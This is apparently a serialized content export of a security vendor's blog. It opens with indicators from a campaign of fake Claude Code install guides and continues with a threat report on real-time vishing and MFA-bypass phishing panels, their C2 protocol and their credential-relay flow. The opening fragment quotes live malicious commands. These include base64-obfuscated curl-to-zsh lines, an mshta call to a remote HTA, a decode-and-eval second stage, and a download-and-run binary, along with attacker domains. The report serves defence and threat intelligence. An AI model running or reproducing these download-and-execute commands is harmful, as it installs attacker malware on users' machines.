payload:",[2866],{"type":313},{},{"nodeType":1752,"data":2869,"content":2870},{},[2871,2881,2891],{"nodeType":1687,"data":2872,"content":2873},{},[2874],{"nodeType":237,"data":2875,"content":2876},{},[2877],{"nodeType":241,"value":2878,"marks":2879,"data":2880},"contatoplus[.]com",[],{},{"nodeType":1687,"data":2882,"content":2883},{},[2884],{"nodeType":237,"data":2885,"content":2886},{},[2887],{"nodeType":241,"value":2888,"marks":2889,"data":2890},"sarahmoftah[.]com",[],{},{"nodeType":1687,"data":2892,"content":2893},{},[2894],{"nodeType":237,"data":2895,"content":2896},{},[2897],{"nodeType":241,"value":2898,"marks":2899,"data":2900},"claude[.]update-version[.]com",[],{},{"nodeType":237,"data":2902,"content":2903},{},[2904],{"nodeType":241,"value":2905,"marks":2906,"data":2908},"Commands:",[2907],{"type":313},{},{"nodeType":237,"data":2910,"content":2911},{},[2912],{"nodeType":241,"value":2913,"marks":2914,"data":2917},"curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84ZDJkMjc1MzYwYWRlZGVjZmJiZDkxNTY3ZGFkZGVlZDgwZDIwYWNlYjhhYTQzMjBkMDZhMjE0ODY0OTM5NDVi'|base64 -D)| zsh",[2915],{"type":2916},"code",{},{"nodeType":237,"data":2919,"content":2920},{},[2921],{"nodeType":241,"value":29,"marks":2922,"data":2923},[],{},{"nodeType":237,"data":2925,"content":2926},{},[2927],{"nodeType":241,"value":2928,"marks":2929,"data":2931},"curl -sfkSL $(echo 'aHR0cHM6Ly93cmljb25zdWx0LmNvbS9jdXJsLzhhZjY1YmEzODg1ZDZlMjU5NmVhMmNlMmRiNGEzYmM1ZWUwMmI4ZGViMzM2ZjlhZTkzZTI2MmM0ZGIwMGI3NTc='|base64 -D)| zsh",[2930],{"type":2916},{},{"nodeType":237,"data":2933,"content":2934},{},[2935],{"nodeType":241,"value":2936,"marks":2937,"data":2938},"\n",[],{},{"nodeType":237,"data":2940,"content":2941},{},[2942],{"nodeType":241,"value":2943,"marks":2944,"data":2946},"C:\\Windows\\SysWOW64\\mshta.exe https://claude.update-version.com/claude ",[2945],{"type":2916},{},{"nodeType":237,"data":2948,"content":2949},{},[2950,2953],{"nodeType":241,"value":2936,"marks":2951,"data":2952},[],{},{"nodeType":241,"value":2954,"marks":2955,"data":2957},"Base64 decoded url:",[2956],{"type":313},{},{"nodeType":237,"data":2959,"content":2960},{},[2961],{"nodeType":241,"value":2962,"marks":2963,"data":2965},"contatoplus[.]com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b ",[2964],{"type":2916},{},{"nodeType":237,"data":2967,"content":2968},{},[2969],{"nodeType":241,"value":29,"marks":2970,"data":2971},[],{},{"nodeType":237,"data":2973,"content":2974},{},[2975],{"nodeType":241,"value":2976,"marks":2977,"data":2979},"saramoftah[.]com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d19420",[2978],{"type":2916},{},{"nodeType":237,"data":2981,"content":2982},{},[2983,2986],{"nodeType":241,"value":2936,"marks":2984,"data":2985},[],{},{"nodeType":241,"value":2987,"marks":2988,"data":2990},"Second stage:",[2989],{"type":313},{},{"nodeType":237,"data":2992,"content":2993},{},[2994],{"nodeType":241,"value":2995,"marks":2996,"data":2998},"#!/bin/zsh",[2997],{"type":2916},{},{"nodeType":237,"data":3000,"content":3001},{},[3002],{"nodeType":241,"value":3003,"marks":3004,"data":3006},"mkgrc9=$(base64 -D \u003C\u003C'PAYLOAD_END' | gunzip",[3005],{"type":2916},{},{"nodeType":237,"data":3008,"content":3009},{},[3010],{"nodeType":241,"value":3011,"marks":3012,"data":3014},"H4sIAKgRpGkC/13LPQqAMAxA4b2niAhdpGYVbxPbSoT+0UYonl5HdXwfvHHA7Uh4NVb2rAFMBpRYkH0ovgKLlLYiNqoU8y7Es80R05LwLI7Eg9bQSaSCsZ/zccsxO5j631+pbrYTnkSAAAAA",[3013],{"type":2916},{},{"nodeType":237,"data":3016,"content":3017},{},[3018],{"nodeType":241,"value":3019,"marks":3020,"data":3022},"PAYLOAD_END",[3021],{"type":2916},{},{"nodeType":237,"data":3024,"content":3025},{},[3026],{"nodeType":241,"value":3027,"marks":3028,"data":3030},")",[3029],{"type":2916},{},{"nodeType":237,"data":3032,"content":3033},{},[3034],{"nodeType":241,"value":3035,"marks":3036,"data":3038},"eval \"$mkgrc9\"",[3037],{"type":2916},{},{"nodeType":237,"data":3040,"content":3041},{},[3042,3045],{"nodeType":241,"value":2936,"marks":3043,"data":3044},[],{},{"nodeType":241,"value":3046,"marks":3047,"data":3049},"Binaries:",[3048],{"type":313},{},{"nodeType":237,"data":3051,"content":3052},{},[3053],{"nodeType":241,"value":2995,"marks":3054,"data":3056},[3055],{"type":2916},{},{"nodeType":237,"data":3058,"content":3059},{},[3060],{"nodeType":241,"value":3061,"marks":3062,"data":3064},"curl -o /tmp/helper https://saramoftah.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper",[3063],{"type":2916},{},"InstallFix: How attackers are weaponizing malvertised install guides  ","Attackers are impersonating popular developer tools like Claude Code to distribute fake install instructions via malicious search engine ads.","installfix",{"items":3069},[3070,3072],{"sys":3071,"name":2041},{"id":2040},{"sys":3073,"name":2045},{"id":2044},{"items":3075},[3076],{"fullName":3077,"firstName":3078,"jobTitle":3079,"profilePicture":3080},"Jacques Louw","Jacques","Co-founder / CRO",{"url":3081},"https://images.ctfassets.net/y1cdw1ablpvd/39m8bektV23lnCRcEq0G8h/2a08f6276a50744f1a4b499b273f6bb2/Push_Founders_at_Cahoots_October_28_2022_by_Doug_Coombe-21.jpg",{"__typename":1180,"sys":3083,"publishedDate":3085,"content":3086,"title":4987,"synopsis":4988,"hashTags":62,"slug":4989,"tagsCollection":4990,"authorsCollection":4996},{"id":3084},"2tz0zEJCarJBkceOYk4zVg","2026-05-07T00:00:00.000Z",{"json":3087},{"nodeType":233,"data":3088,"content":3089},{},[3090,3097,3127,3138,3145,3151,3163,3169,3172,3180,3187,3250,3257,3263,3266,3274,3281,3287,3295,3302,3428,3434,3440,3446,3452,3460,3467,3474,3537,3544,3550,3556,3564,3571,3578,3586,3593,3626,3633,3639,3646,3694,3701,3709,3716,3722,3729,3736,3742,3749,3782,3789,3795,3798,3806,3813,3820,3827,3833,3840,3847,3853,3860,3866,3873,3879,3886,3893,3896,3904,3920,3927,3947,4190,4197,4229,4464,4471,4478,4679,4686,4871,4874,4882,4889,4896,4908,4911,4918,4935,4952,4959,4962,4970],{"nodeType":237,"data":3091,"content":3092},{},[3093],{"nodeType":241,"value":3094,"marks":3095,"data":3096},"When Push blocks an attack in the browser, we take the opportunity to do some more digging to see what else we can find. One recent detection led us down the rabbit hole — and right into a criminal phishing panel. ",[],{},{"nodeType":237,"data":3098,"content":3099},{},[3100,3104,3111,3115,3123],{"nodeType":241,"value":3101,"marks":3102,"data":3103},"Real-time operated phishing panels have been used extensively in recent months, in vishing + phishing attacks attributed to first ",[],{},{"nodeType":260,"data":3105,"content":3106},{"uri":1700},[3107],{"nodeType":241,"value":3108,"marks":3109,"data":3110},"ShinyHunters",[],{},{"nodeType":241,"value":3112,"marks":3113,"data":3114},", and more recently the ",[],{},{"nodeType":260,"data":3116,"content":3118},{"uri":3117},"https://www.bleepingcomputer.com/news/security/new-blackfile-extortion-gang-targets-retail-and-hospitality-orgs/",[3119],{"nodeType":241,"value":3120,"marks":3121,"data":3122},"BlackFile",[],{},{"nodeType":241,"value":3124,"marks":3125,"data":3126}," hacking group, with a significant overlap in techniques and tooling. ",[],{},{"nodeType":237,"data":3128,"content":3129},{},[3130,3135],{"nodeType":241,"value":3131,"marks":3132,"data":3134},"We’ve directly accessed active deployments of the operator panels driving these campaigns, observed what happens in real-time when a victim is targeted, and analyzed multiple variants and forks of the tooling. ",[3133],{"type":313},{},{"nodeType":241,"value":566,"marks":3136,"data":3137},[],{},{"nodeType":237,"data":3139,"content":3140},{},[3141],{"nodeType":241,"value":3142,"marks":3143,"data":3144},"We identified four primary infrastructure clusters, with each deployment having its own panel implementation. While the panels share common heritage, the operators deploying them appear to be separate groups with different infrastructure preferences and operational patterns.",[],{},{"nodeType":292,"data":3146,"content":3150},{"target":3147},{"sys":3148},{"id":3149,"type":297,"linkType":298},"5BQOpzjSbobLx8OkvXl6os",[],{"nodeType":237,"data":3152,"content":3153},{},[3154,3158],{"nodeType":241,"value":3155,"marks":3156,"data":3157},"The existence of these independently branded forks indicates that the tooling has entered a phase of wider distribution — operators who obtained the original panel source are now customizing and reshipping it for their own purposes. As a result, the tooling is now most likely accessible to a broad population of financially motivated threat actors. ",[],{},{"nodeType":241,"value":3159,"marks":3160,"data":3162},"In total, we’ve identified over 400 domains linked to the attacks, giving an indication of the scale. ",[3161],{"type":313},{},{"nodeType":292,"data":3164,"content":3168},{"target":3165},{"sys":3166},{"id":3167,"type":297,"linkType":298},"2Z1LUdYXVONWO9nnJTkWsJ",[],{"nodeType":320,"data":3170,"content":3171},{},[],{"nodeType":324,"data":3173,"content":3174},{},[3175],{"nodeType":241,"value":3176,"marks":3177,"data":3179},"Background",[3178],{"type":313},{},{"nodeType":237,"data":3181,"content":3182},{},[3183],{"nodeType":241,"value":3184,"marks":3185,"data":3186},"Since at least August 2025, attackers have been running hybrid social engineering campaigns targeting hundreds of organizations across financial services, technology, cryptocurrency, healthcare, hospitality, and private aviation. ",[],{},{"nodeType":1752,"data":3188,"content":3189},{},[3190,3205,3220,3235],{"nodeType":1687,"data":3191,"content":3192},{},[3193],{"nodeType":237,"data":3194,"content":3195},{},[3196,3201],{"nodeType":241,"value":3197,"marks":3198,"data":3200},"August 2025: ",[3199],{"type":313},{},{"nodeType":241,"value":3202,"marks":3203,"data":3204},"Tooling made available, used in crypto-focused attacks",[],{},{"nodeType":1687,"data":3206,"content":3207},{},[3208],{"nodeType":237,"data":3209,"content":3210},{},[3211,3216],{"nodeType":241,"value":3212,"marks":3213,"data":3215},"November 2025:",[3214],{"type":313},{},{"nodeType":241,"value":3217,"marks":3218,"data":3219}," Major attacks on enterprise identity platforms begin",[],{},{"nodeType":1687,"data":3221,"content":3222},{},[3223],{"nodeType":237,"data":3224,"content":3225},{},[3226,3231],{"nodeType":241,"value":3227,"marks":3228,"data":3230},"January 2026: ",[3229],{"type":313},{},{"nodeType":241,"value":3232,"marks":3233,"data":3234},"Public breaches reported",[],{},{"nodeType":1687,"data":3236,"content":3237},{},[3238],{"nodeType":237,"data":3239,"content":3240},{},[3241,3246],{"nodeType":241,"value":3242,"marks":3243,"data":3245},"March 2026: ",[3244],{"type":313},{},{"nodeType":241,"value":3247,"marks":3248,"data":3249},"Activity spikes again",[],{},{"nodeType":237,"data":3251,"content":3252},{},[3253],{"nodeType":241,"value":3254,"marks":3255,"data":3256},"The attacks combine voice phishing with MFA-bypassing adversary-in-the-middle (AiTM) phishing mechanisms that allow the attacker to steal authenticated sessions for target applications — typically enterprise identity providers and cryptocurrency exchanges. Once an identity provider account is compromised, the attackers pivot across connected SaaS platforms — SharePoint, Salesforce, DocuSign, Slack — exfiltrates data, and attempts to extort the victim organization. ",[],{},{"nodeType":292,"data":3258,"content":3262},{"target":3259},{"sys":3260},{"id":3261,"type":297,"linkType":298},"2X2YXMpozrbRQhegk7yF1k",[],{"nodeType":320,"data":3264,"content":3265},{},[],{"nodeType":324,"data":3267,"content":3268},{},[3269],{"nodeType":241,"value":3270,"marks":3271,"data":3273},"Inside the panels: what Push found",[3272],{"type":313},{},{"nodeType":237,"data":3275,"content":3276},{},[3277],{"nodeType":241,"value":3278,"marks":3279,"data":3280},"Push detected an active Okta phishing site with TTPs aligned to the tooling used by SLH and affiliated groups. Through analysis of the phishing infrastructure, we gained direct access to Doko’s Panel and variants, and were able to observe how these attacks unfold from the operator's perspective — including real victim submission logs from the current week confirming ongoing active operations.",[],{},{"nodeType":292,"data":3282,"content":3286},{"target":3283},{"sys":3284},{"id":3285,"type":297,"linkType":298},"5ND0etPs5xN7ejz24l71jy",[],{"nodeType":605,"data":3288,"content":3289},{},[3290],{"nodeType":241,"value":3291,"marks":3292,"data":3294},"How the attack works",[3293],{"type":313},{},{"nodeType":237,"data":3296,"content":3297},{},[3298],{"nodeType":241,"value":3299,"marks":3300,"data":3301},"The general sequence of steps is the same across the panels:",[],{},{"nodeType":1752,"data":3303,"content":3304},{},[3305,3320,3335,3359,3374,3389,3413],{"nodeType":1687,"data":3306,"content":3307},{},[3308],{"nodeType":237,"data":3309,"content":3310},{},[3311,3316],{"nodeType":241,"value":3312,"marks":3313,"data":3315},"The operator calls the target",[3314],{"type":313},{},{"nodeType":241,"value":3317,"marks":3318,"data":3319}," spoofing the organization's IT helpdesk number, often referencing real employee names or internal ticket numbers to establish trust. The target is directed to a phishing domain — usually following a combosquatting pattern like my\u003Ctarget>internal[.]com or \u003Ctarget>sso[.]com — under the pretext of a mandatory security update, passkey enrollment, or support ticket resolution. ",[],{},{"nodeType":1687,"data":3321,"content":3322},{},[3323],{"nodeType":237,"data":3324,"content":3325},{},[3326,3331],{"nodeType":241,"value":3327,"marks":3328,"data":3330},"The victim lands on the phishing domain",[3329],{"type":313},{},{"nodeType":241,"value":3332,"marks":3333,"data":3334}," and is presented with a loading spinner — the anti-bot gate that prevents unauthorized access to the phishing pages.",[],{},{"nodeType":1687,"data":3336,"content":3337},{},[3338],{"nodeType":237,"data":3339,"content":3340},{},[3341,3346,3350,3355],{"nodeType":241,"value":3342,"marks":3343,"data":3345},"The operator accepts the visitor",[3344],{"type":313},{},{"nodeType":241,"value":3347,"marks":3348,"data":3349}," from the admin panel and ",[],{},{"nodeType":241,"value":3351,"marks":3352,"data":3354},"the victim is redirected",[3353],{"type":313},{},{"nodeType":241,"value":3356,"marks":3357,"data":3358}," to the cloned login page (e.g. Google, Microsoft, Okta).",[],{},{"nodeType":1687,"data":3360,"content":3361},{},[3362],{"nodeType":237,"data":3363,"content":3364},{},[3365,3370],{"nodeType":241,"value":3366,"marks":3367,"data":3369},"The victim enters their email address and password",[3368],{"type":313},{},{"nodeType":241,"value":3371,"marks":3372,"data":3373},", which is forwarded to the operator's Telegram channel. The victim sees a processing spinner on the branded login form.",[],{},{"nodeType":1687,"data":3375,"content":3376},{},[3377],{"nodeType":237,"data":3378,"content":3379},{},[3380,3385],{"nodeType":241,"value":3381,"marks":3382,"data":3384},"The operator relays the credentials",[3383],{"type":313},{},{"nodeType":241,"value":3386,"marks":3387,"data":3388}," to the real identity provider. If they're valid, the attack proceeds. If they're invalid, the operator can redirect the victim back to the credential entry pages. Assuming MFA is required, the operator issues a redirect to an appropriate MFA capture page — \"Submit SMS OTP,\" \"Submit Gauth OTP,\" or \"Approve [XX] Prompt,\" depending on what the legitimate IdP is presenting.",[],{},{"nodeType":1687,"data":3390,"content":3391},{},[3392],{"nodeType":237,"data":3393,"content":3394},{},[3395,3400,3404,3409],{"nodeType":241,"value":3396,"marks":3397,"data":3399},"The victim submits their OTP or approves the push notification ",[3398],{"type":313},{},{"nodeType":241,"value":3401,"marks":3402,"data":3403},"and",[],{},{"nodeType":241,"value":3405,"marks":3406,"data":3408}," the operator relays the OTP",[3407],{"type":313},{},{"nodeType":241,"value":3410,"marks":3411,"data":3412}," in their own login session, completes authentication, and captures the session. ",[],{},{"nodeType":1687,"data":3414,"content":3415},{},[3416],{"nodeType":237,"data":3417,"content":3418},{},[3419,3424],{"nodeType":241,"value":3420,"marks":3421,"data":3423},"The victim is redirected to a benign page",[3422],{"type":313},{},{"nodeType":241,"value":3425,"marks":3426,"data":3427}," (e.g., Google Drive) or to a support ticket closure screen displaying a fabricated ticket number.",[],{},{"nodeType":292,"data":3429,"content":3433},{"target":3430},{"sys":3431},{"id":3432,"type":297,"linkType":298},"1o0wm3EOd7zSl5MddsNxgL",[],{"nodeType":292,"data":3435,"content":3439},{"target":3436},{"sys":3437},{"id":3438,"type":297,"linkType":298},"7w7SQEn3aITpcgXLMThhbS",[],{"nodeType":237,"data":3441,"content":3442},{},[3443],{"nodeType":241,"value":29,"marks":3444,"data":3445},[],{},{"nodeType":292,"data":3447,"content":3451},{"target":3448},{"sys":3449},{"id":3450,"type":297,"linkType":298},"PJJabY1ZfoCfl8XQ6PMj2",[],{"nodeType":605,"data":3453,"content":3454},{},[3455],{"nodeType":241,"value":3456,"marks":3457,"data":3459},"Doko’s Panel",[3458],{"type":313},{},{"nodeType":237,"data":3461,"content":3462},{},[3463],{"nodeType":241,"value":3464,"marks":3465,"data":3466},"Let’s take a closer look at the panels themselves. We'll start with the default version of Doko's Panel since it’s the most established. It provides a multi-functional framework targeting users of Google, Microsoft Entra, Okta, and popular cryptocurrency exchanges including Abra, Coinbase, Gemini, and Kraken. Its core functionality resides in a client-side JavaScript file (client.js) that establishes the real-time feedback loop between the victim's browser and the operator's C2.",[],{},{"nodeType":237,"data":3468,"content":3469},{},[3470],{"nodeType":241,"value":3471,"marks":3472,"data":3473},"The technical indicators that characterize Doko's Panel in its standard form include:",[],{},{"nodeType":1752,"data":3475,"content":3476},{},[3477,3492,3507,3522],{"nodeType":1687,"data":3478,"content":3479},{},[3480],{"nodeType":237,"data":3481,"content":3482},{},[3483,3488],{"nodeType":241,"value":3484,"marks":3485,"data":3487},"client.js",[3486],{"type":313},{},{"nodeType":241,"value":3489,"marks":3490,"data":3491}," containing a pingServer() function that sends a JSON POST request to /backend.php every second with the structure { action: 'ping', token, window_id, page, os, browser }. If the response contains a redirect key, the victim's browser navigates to that path. ",[],{},{"nodeType":1687,"data":3493,"content":3494},{},[3495],{"nodeType":237,"data":3496,"content":3497},{},[3498,3503],{"nodeType":241,"value":3499,"marks":3500,"data":3502},"sendTelegramMessage()",[3501],{"type":313},{},{"nodeType":241,"value":3504,"marks":3505,"data":3506}," (aliased to sendtg()), a function for relaying real-time credential submissions and session updates to the operator's Telegram channel.",[],{},{"nodeType":1687,"data":3508,"content":3509},{},[3510],{"nodeType":237,"data":3511,"content":3512},{},[3513,3518],{"nodeType":241,"value":3514,"marks":3515,"data":3517},"backend.php",[3516],{"type":313},{},{"nodeType":241,"value":3519,"marks":3520,"data":3521}," as the primary server-side handler for both victim ping actions and admin panel operations (retrieving connected victim information, sending redirect instructions).",[],{},{"nodeType":1687,"data":3523,"content":3524},{},[3525],{"nodeType":237,"data":3526,"content":3527},{},[3528,3533],{"nodeType":241,"value":3529,"marks":3530,"data":3532},"j.php",[3531],{"type":313},{},{"nodeType":241,"value":3534,"marks":3535,"data":3536}," as the endpoint for sending Telegram messages, relaying captured credentials and session logs.",[],{},{"nodeType":237,"data":3538,"content":3539},{},[3540],{"nodeType":241,"value":3541,"marks":3542,"data":3543},"Push found that deployments of Doko's Panel had minimal security by default — anyone was able to view the admin panel and manage visitors' connections without authentication.",[],{},{"nodeType":292,"data":3545,"content":3549},{"target":3546},{"sys":3547},{"id":3548,"type":297,"linkType":298},"3glwGSGHdCpf3DLqNmQqN8",[],{"nodeType":292,"data":3551,"content":3555},{"target":3552},{"sys":3553},{"id":3554,"type":297,"linkType":298},"20ymWIXMkmJlw7XYb93c9o",[],{"nodeType":605,"data":3557,"content":3558},{},[3559],{"nodeType":241,"value":3560,"marks":3561,"data":3563},"Panel proliferation and remixes",[3562],{"type":313},{},{"nodeType":237,"data":3565,"content":3566},{},[3567],{"nodeType":241,"value":3568,"marks":3569,"data":3570},"Access to Doko's Panel has clearly proliferated beyond its original developers, resulting in remixes and variants being distributed across the ecosystem. Push identified a variant titled \"Lord Mensius's Panel\" targeting Koinly (a cryptocurrency tax platform), and another titled \"$$$\" using a template impersonating the Australian Tax Office, also targeting cryptocurrency tax filing. ",[],{},{"nodeType":237,"data":3572,"content":3573},{},[3574],{"nodeType":241,"value":3575,"marks":3576,"data":3577},"The existence of these independently branded forks indicates that the tooling has entered a phase of wider distribution — operators who obtained the original panel source are now customizing and reshipping it for their own purposes. As a result, the tooling is now accessible to a broad population of financially motivated threat actors. ",[],{},{"nodeType":605,"data":3579,"content":3580},{},[3581],{"nodeType":241,"value":3582,"marks":3583,"data":3585},"heartbeat/check_redirect variant",[3584],{"type":313},{},{"nodeType":237,"data":3587,"content":3588},{},[3589],{"nodeType":241,"value":3590,"marks":3591,"data":3592},"In addition to Doko’s Panel and its forks, the site initially detected by Push used a modified variant of Doko's Panel with a different C2 protocol. Rather than the standard ping action, this variant sent two types of regular requests from client.js to the backend:",[],{},{"nodeType":1752,"data":3594,"content":3595},{},[3596,3611],{"nodeType":1687,"data":3597,"content":3598},{},[3599],{"nodeType":237,"data":3600,"content":3601},{},[3602,3607],{"nodeType":241,"value":3603,"marks":3604,"data":3606},"Heartbeat",[3605],{"type":313},{},{"nodeType":241,"value":3608,"marks":3609,"data":3610}," — POST to backend.php with action=heartbeat along with page, token, and window_id.",[],{},{"nodeType":1687,"data":3612,"content":3613},{},[3614],{"nodeType":237,"data":3615,"content":3616},{},[3617,3622],{"nodeType":241,"value":3618,"marks":3619,"data":3621},"Check Redirect",[3620],{"type":313},{},{"nodeType":241,"value":3623,"marks":3624,"data":3625}," — GET to backend.php with parameters action=check_redirect along with token and window_id.",[],{},{"nodeType":237,"data":3627,"content":3628},{},[3629],{"nodeType":241,"value":3630,"marks":3631,"data":3632},"A redirect instruction in response to either request causes the victim's browser to navigate to the specified page. The variant compounds this with a separate inline script embedded in the landing gate HTML — in addition to client.js — that schedules its own sendHeartbeat() and checkRedirect() functions on regular intervals. ",[],{},{"nodeType":292,"data":3634,"content":3638},{"target":3635},{"sys":3636},{"id":3637,"type":297,"linkType":298},"6zRc9ublZvEQCxcWtMBSnF",[],{"nodeType":237,"data":3640,"content":3641},{},[3642],{"nodeType":241,"value":3643,"marks":3644,"data":3645},"Additional technical differentiators for this variant include:",[],{},{"nodeType":1752,"data":3647,"content":3648},{},[3649,3664,3679],{"nodeType":1687,"data":3650,"content":3651},{},[3652],{"nodeType":237,"data":3653,"content":3654},{},[3655,3660],{"nodeType":241,"value":3656,"marks":3657,"data":3659},"UUID generation",[3658],{"type":313},{},{"nodeType":241,"value":3661,"marks":3662,"data":3663}," using Math.random() to replace x in the template xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx, rather than the original Doko's Panel method of constructing a template from [1e7]+-1e3+-4e3+-8e3+-1e11 and replacing [018].",[],{},{"nodeType":1687,"data":3665,"content":3666},{},[3667],{"nodeType":237,"data":3668,"content":3669},{},[3670,3675],{"nodeType":241,"value":3671,"marks":3672,"data":3674},"No central Telegram sending function",[3673],{"type":313},{},{"nodeType":241,"value":3676,"marks":3677,"data":3678},", though j.php still exists and is called from inline scripts on individual phishing pages.",[],{},{"nodeType":1687,"data":3680,"content":3681},{},[3682],{"nodeType":237,"data":3683,"content":3684},{},[3685,3690],{"nodeType":241,"value":3686,"marks":3687,"data":3689},"No use of FNV-1a",[3688],{"type":313},{},{"nodeType":241,"value":3691,"marks":3692,"data":3693}," to hash-generate the window ID.",[],{},{"nodeType":237,"data":3695,"content":3696},{},[3697],{"nodeType":241,"value":3698,"marks":3699,"data":3700},"Push also found sub-variants hosting Okta phishing pages with additional modifications: a minified client.js script, and a renamed backend endpoint (api_FyekIDWY.php replacing backend.php).",[],{},{"nodeType":605,"data":3702,"content":3703},{},[3704],{"nodeType":241,"value":3705,"marks":3706,"data":3708},"Revamped admin panel",[3707],{"type":313},{},{"nodeType":237,"data":3710,"content":3711},{},[3712],{"nodeType":241,"value":3713,"marks":3714,"data":3715},"Push also found examples of a significantly revamped admin panel, including a version from April 2026 specifically targeting Microsoft as an enterprise identity provider. ",[],{},{"nodeType":292,"data":3717,"content":3721},{"target":3718},{"sys":3719},{"id":3720,"type":297,"linkType":298},"3ufb4cotpg0f7yoIQJnND0",[],{"nodeType":237,"data":3723,"content":3724},{},[3725],{"nodeType":241,"value":3726,"marks":3727,"data":3728},"This panel featured a more sophisticated operator interface with an updated look, quick action buttons, and sound notifications.",[],{},{"nodeType":237,"data":3730,"content":3731},{},[3732],{"nodeType":241,"value":3733,"marks":3734,"data":3735},"In addition to the standard compromise flow for acquiring email, password, and OTP, this panel provided operator actions for sending Microsoft Teams call instructions to the victim — a Meeting ID and Passcode rendered on a branded page. This capability likely enables further interaction through a channel that supports screensharing, extending the attacker's reach beyond credential theft into live session manipulation. It also has the potential to make the scenario more believable for the victim.",[],{},{"nodeType":292,"data":3737,"content":3741},{"target":3738},{"sys":3739},{"id":3740,"type":297,"linkType":298},"4pg65d1SvTJA3xm6AsxZBp",[],{"nodeType":237,"data":3743,"content":3744},{},[3745],{"nodeType":241,"value":3746,"marks":3747,"data":3748},"Other capabilities were referenced in the panel's source code but did not appear active in the observed deployment:",[],{},{"nodeType":1752,"data":3750,"content":3751},{},[3752,3767],{"nodeType":1687,"data":3753,"content":3754},{},[3755],{"nodeType":237,"data":3756,"content":3757},{},[3758,3763],{"nodeType":241,"value":3759,"marks":3760,"data":3762},"Additional MFA approval pages",[3761],{"type":313},{},{"nodeType":241,"value":3764,"marks":3765,"data":3766}," for Duo and Okta, with the operator providing a code to display to the victim.",[],{},{"nodeType":1687,"data":3768,"content":3769},{},[3770],{"nodeType":237,"data":3771,"content":3772},{},[3773,3778],{"nodeType":241,"value":3774,"marks":3775,"data":3777},"A code execution prompt",[3776],{"type":313},{},{"nodeType":241,"value":3779,"marks":3780,"data":3781}," to instruct the victim to run a command — the placeholder example being mshta to execute a remote HTA file, suggesting a potential bridge from identity compromise into malware delivery.",[],{},{"nodeType":237,"data":3783,"content":3784},{},[3785],{"nodeType":241,"value":3786,"marks":3787,"data":3788},"The admin panel also included settings for restricting access to specific geographic locations and device types, allowing operators to refine their campaign targeting and also avoid detection from unusual devices (often an indicator that the visitor is not a real human and is actually a security tool or bot).",[],{},{"nodeType":292,"data":3790,"content":3794},{"target":3791},{"sys":3792},{"id":3793,"type":297,"linkType":298},"1hebGtxbkyuejWXczwx5n6",[],{"nodeType":320,"data":3796,"content":3797},{},[],{"nodeType":324,"data":3799,"content":3800},{},[3801],{"nodeType":241,"value":3802,"marks":3803,"data":3805},"LLM-generated tells: vibe-coded phishing infrastructure",[3804],{"type":313},{},{"nodeType":237,"data":3807,"content":3808},{},[3809],{"nodeType":241,"value":3810,"marks":3811,"data":3812},"Evidence of extensive LLM use is extremely prevalent in attacks detected by Push, from LLM-generated phishing kits and tools to vibe-coded cloned pages. Attackers have also been observed leveraging AI–assisted capabilities in SaaS platforms to automate and scale-up their campaigns from an infrastructure and operations perspective. ",[],{},{"nodeType":237,"data":3814,"content":3815},{},[3816],{"nodeType":241,"value":3817,"marks":3818,"data":3819},"The ‘heartbeat’ variant in particular has significant tells of heavy use of LLMs to modify the phishing panel for the operator’s needs. The fact that these are so blatant increases the belief that these tools are being vibe-coded by relatively inexperienced developers with limited regard for operational security.",[],{},{"nodeType":237,"data":3821,"content":3822},{},[3823],{"nodeType":241,"value":3824,"marks":3825,"data":3826},"Some versions of client.js begin with verbose header comments that no human developer would write:",[],{},{"nodeType":292,"data":3828,"content":3832},{"target":3829},{"sys":3830},{"id":3831,"type":297,"linkType":298},"01mOiserRBXraawXwQyJNm",[],{"nodeType":237,"data":3834,"content":3835},{},[3836],{"nodeType":241,"value":3837,"marks":3838,"data":3839},"The \"NOTES FOR NEXT SESSION\" header is particularly telling — it's a pattern generated by LLMs that maintain context between chat sessions, not a convention any human developer would adopt in production code, let alone in a phishing kit where operational security should discourage self-documenting infrastructure.",[],{},{"nodeType":237,"data":3841,"content":3842},{},[3843],{"nodeType":241,"value":3844,"marks":3845,"data":3846},"The admin panel HTML contains similarly over-documented opening comments:",[],{},{"nodeType":292,"data":3848,"content":3852},{"target":3849},{"sys":3850},{"id":3851,"type":297,"linkType":298},"60snRhz0RIsvLI6OU9RDOk",[],{"nodeType":237,"data":3854,"content":3855},{},[3856],{"nodeType":241,"value":3857,"marks":3858,"data":3859},"One of the Okta cloned login pages observed by Push contained the following comments suggesting the use of an LLM to create the clone:",[],{},{"nodeType":292,"data":3861,"content":3865},{"target":3862},{"sys":3863},{"id":3864,"type":297,"linkType":298},"1WCd5LQ6cfPf1IsNAhPSIT",[],{"nodeType":237,"data":3867,"content":3868},{},[3869],{"nodeType":241,"value":3870,"marks":3871,"data":3872},"The cloned Microsoft login pages displayed previously contain terser comments, but still typical of useless comments that are included by an LLM rather than a human author, especially a malware/phishing author:",[],{},{"nodeType":292,"data":3874,"content":3878},{"target":3875},{"sys":3876},{"id":3877,"type":297,"linkType":298},"6WN59mkiscNmAt8dmOR81c",[],{"nodeType":237,"data":3880,"content":3881},{},[3882],{"nodeType":241,"value":3883,"marks":3884,"data":3885},"The broken duplication in the heartbeat variant — where an inline script and client.js independently schedule the same backend requests using slightly different data formats — is consistent with an operator pasting requirements into an LLM and accepting the output without understanding the existing codebase well enough to recognize the redundancy.",[],{},{"nodeType":237,"data":3887,"content":3888},{},[3889],{"nodeType":241,"value":3890,"marks":3891,"data":3892},"Clearly, the barrier to entry for building (or forking) and operating a real-time vishing phishing panel is lower than the effectiveness of the tooling might suggest.",[],{},{"nodeType":320,"data":3894,"content":3895},{},[],{"nodeType":324,"data":3897,"content":3898},{},[3899],{"nodeType":241,"value":3900,"marks":3901,"data":3903},"Infrastructure clustering and attribution",[3902],{"type":313},{},{"nodeType":237,"data":3905,"content":3906},{},[3907,3911,3916],{"nodeType":241,"value":3908,"marks":3909,"data":3910},"Through analysis of phishing domains, hosting infrastructure, and technical indicators in the panel source code, ",[],{},{"nodeType":241,"value":3912,"marks":3913,"data":3915},"we’re highlighting four distinct infrastructure clusters associated with this tooling. ",[3914],{"type":313},{},{"nodeType":241,"value":3917,"marks":3918,"data":3919},"While the panels share common heritage, the operators deploying them appear to be separate groups with different infrastructure preferences and operational 